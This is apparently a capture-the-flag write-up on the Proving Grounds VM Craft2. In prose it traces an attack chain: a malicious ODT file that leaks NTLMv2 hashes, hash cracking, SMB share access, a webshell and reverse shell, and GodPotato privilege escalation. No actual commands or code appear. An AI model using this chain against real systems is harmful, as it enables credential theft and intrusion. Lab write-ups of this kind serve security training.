Craft2

Information

This Proving Grounds VM is an updated version of Craft which was a lot of fun!

Enumerated Ports & Services

Findings

This host is the hardened version of the VM Craft. On the Craft VM, you would send a macro-enabled .odt file which downloaded powercat and eventually got reverse shell. This time, the uploaded odt was checked for macro phishing and was not accepting the already leveraged vulnerability in Craft.

Badodt.py

After some digging I found badodt.py. This creates a malicious ODF document that can help leak Net-NTLMv2 credentials. Leveraged authentication from another user by sending an odt file which contained smb share code pointed to my IP:

This allowed me to grab the Net-NTLMv2 hash of thecybergeek user:

I grabbed one of the hashes and used hashcat to crack it:

After cracking the hash, I confirmed the credentials were working with crackmapexec smb and enumerated the shares:

Once the shares were enumerated, I gained access with smbclient:

I tried to upload a file and it was successful. I uploaded a webshell and an msfvenom executable to gain a reverse shell through metasploit:

After uploading shell.php and msfvenon executable I executed the binary to gain shell access:

Got the first flag under the apache user's desktop:

Since I had the user credentials that were obtained from the mock smb server, I used RunAsCs executable to run a command as the user and check the user's privilege:

Perfect! The user has SeImpersonatePrivileges. I downloaded nc.exe to the Users/Public directory and executed nc as the user gaining a reverse shell as the user:

After gaining access as the user, I downloaded godpotato.exe to attempt privilege escalation since the user now had SeImpersonatePrivilege...

Privilege Escalation

booyah. Ran GodPotato.exe with the downloaded nc.exe in users/public to chain the privilege escalation to a reverse shell:

Final Notes

References